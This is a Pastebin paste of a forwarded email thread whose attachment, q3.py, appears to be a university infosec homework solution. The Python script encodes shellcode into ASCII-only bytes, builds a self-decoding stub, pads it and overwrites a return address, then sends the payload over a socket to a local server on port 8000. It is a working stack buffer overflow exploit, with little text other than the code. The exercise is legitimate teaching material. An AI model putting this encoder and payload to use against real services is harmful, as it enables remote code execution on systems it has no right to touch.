API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 13th, 2019
276
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.40 KB | None | 0 0
raw download clone embed print report
  1.  
  2. Conversation opened. 4 messages. All messages read.
  3.  
  4. Skip to content
  5. Using Gmail with screen readers
  6.  
  7. 19 of 1,941
  8. Fwd: infosec 5 complete
  9. Inbox
  10. x
  11.  
  12. Guy Pinchuk
  13. AttachmentsSun, Apr 7, 12:09 PM (6 days ago)
  14. ---------- Forwarded message ---------- From: Oz Ben Simhon <oz.b.simhon@gmail.com> Date: 6 Apr 2019, 22:08 +0300 To: guypinchuk@gmail.com Subject: Fwd: infosec
  15.  
  16. eranchriqui
  17. AttachmentsSun, Apr 7, 12:12 PM (6 days ago)
  18. ---------- Forwarded message --------- From: Guy Pinchuk <guypinchuk@gmail.com> Date: Sun, 7 Apr 2019 at 12:09 Subject: Fwd: infosec 5 complete To: <eranchriqui
  19.  
  20. eranchriqui
  21. AttachmentsTue, Apr 9, 7:50 PM (4 days ago)
  22. ---------- Forwarded message --------- From: eranchriqui <eranchriqui@gmail.com> Date: Sun, 7 Apr 2019 at 12:12 Subject: Fwd: infosec 5 complete To: itaizur@mai
  23.  
  24. eranchriqui <eranchriqui@gmail.com>
  25. Attachments
  26. Tue, Apr 9, 8:04 PM (4 days ago)
  27. to altmark@mail.tau.ac.il
  28.  
  29.  
  30. 7 Attachments
  31.  
  32. #!/usr/bin/python
  33.  
  34. import functools, os, socket, traceback, assemble, struct
  35. import q2
  36.  
  37.  
  38. HOST        = '127.0.0.1'
  39. SERVER_PORT = 8000
  40. LOCAL_PORT  = 1337
  41.  
  42.  
  43. ASCII_MAX = 0x7f
  44.  
  45.  
  46. def warn_invalid_ascii(selector=None):
  47.     selector = selector or (lambda x: x)
  48.     def decorator(func):
  49.         @functools.wraps(func)
  50.         def result(*args, **kwargs):
  51.             ret = func(*args, **kwargs)
  52.             i = 0
  53.             for c in selector(ret):
  54.                 i+=1
  55.                 if ord(c) > ASCII_MAX:
  56.                     print(str(ord(c))+" at position " + str(i))
  57.             if any(ord(c) > ASCII_MAX for c in selector(ret)):
  58.                 print('WARNING: Non ASCII chars in return value from %s at\n%s'
  59.                       % (func.__name__, ''.join(traceback.format_stack()[:-1])))
  60.             return ret
  61.         return result
  62.     return decorator
  63.  
  64.  
  65. def get_raw_shellcode():
  66.     return q2.get_shellcode()
  67.  
  68.  
  69. @warn_invalid_ascii(lambda (x,y): x)
  70. def encode(data):
  71.     shellcode = list(data)
  72.     indices_array = []
  73.  
  74.     for i in range(len(shellcode)):
  75.         byte_value = ord(shellcode[i])
  76.         if( byte_value > 0x7f ):
  77.             indices_array.append(i)
  78.             shellcode[i] = chr(byte_value^0xff)
  79.  
  80.     return "".join(shellcode),indices_array
  81.  
  82.  
  83. @warn_invalid_ascii()
  84. def get_decoder(indices):
  85.     command_array = []
  86.    
  87.     #set BL to 0xff under opcode ascii boundry
  88.     set_BL_ff_command = assemble.assemble_data("PUSH 0 ;POP EBX ;DEC EBX ;")
  89.     command_array.append(set_BL_ff_command)
  90.    
  91.     # Small Hack :) I forced a valid opcode for 'ADD EAX, 127 ;'
  92.     add_127_command = '\x05\x7f\x00\x00\x00'
  93.    
  94.     acc_127 = 0
  95.     for i in indices:
  96.         while (i-acc_127) > 127:
  97.             acc_127+=127
  98.             command_array.append(add_127_command)
  99.         curent_command = assemble.assemble_data("XOR byte ptr [EAX+"+ str(i-acc_127) +"], BL; ")
  100.         command_array.append(curent_command)
  101.     return ''.join(command_array)
  102.  
  103.  
  104.  
  105.  
  106. @warn_invalid_ascii()
  107. def get_shellcode():
  108.     q2_shellcode = get_raw_shellcode()
  109.     encoded_sheelcode, indices_array = encode(q2_shellcode)
  110.     decoder_code = get_decoder(indices_array)
  111.     # the +4 is because we already poped the caller returned address, so esp is 4 bytes behind.
  112.     # Regarding "DEC EAX ;"*(len(q2_shellcode)+4), This is poor solution! but I decided not to waist more time on finding valid ascii opcode
  113.     load_eax = "PUSH ESP ;POP EAX ;"+" DEC EAX ;"*(len(q2_shellcode)+4)
  114.     assembled_load_eax = assemble.assemble_data(load_eax)
  115.  
  116.     return assembled_load_eax+decoder_code+encoded_sheelcode
  117.  
  118.  
  119. @warn_invalid_ascii(lambda x: x[4:-5])
  120. def get_payload():
  121.     shellcode = get_shellcode()
  122.     return_address = network_order_uint32(0xbfffdddc, False)
  123.     # we cant pad with nop because of ascii limit,
  124.     # padding with inc aex until shellcode len will reach 1040,
  125.     # I can 'inc eax' becase first command in my shell code is 'mov eax, esp'
  126.     message = shellcode.rjust(1040,'\x41')+return_address
  127.    
  128.     return network_order_uint32(len(message),True) + message
  129.  
  130.  
  131. def network_order_uint32(value,little):
  132.     if little:
  133.         return struct.pack('>L', value)
  134.     else:
  135.         return struct.pack('<I', value)
  136.  
  137. def main():
  138.     payload = get_payload()
  139.     conn = socket.socket()
  140.     conn.connect((HOST, SERVER_PORT))
  141.     try:
  142.         conn.sendall(payload)
  143.     finally:
  144.         conn.close()
  145.  
  146.  
  147. if __name__ == '__main__':
  148.     main()
  149. q3.py
  150. Zoomed into item.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!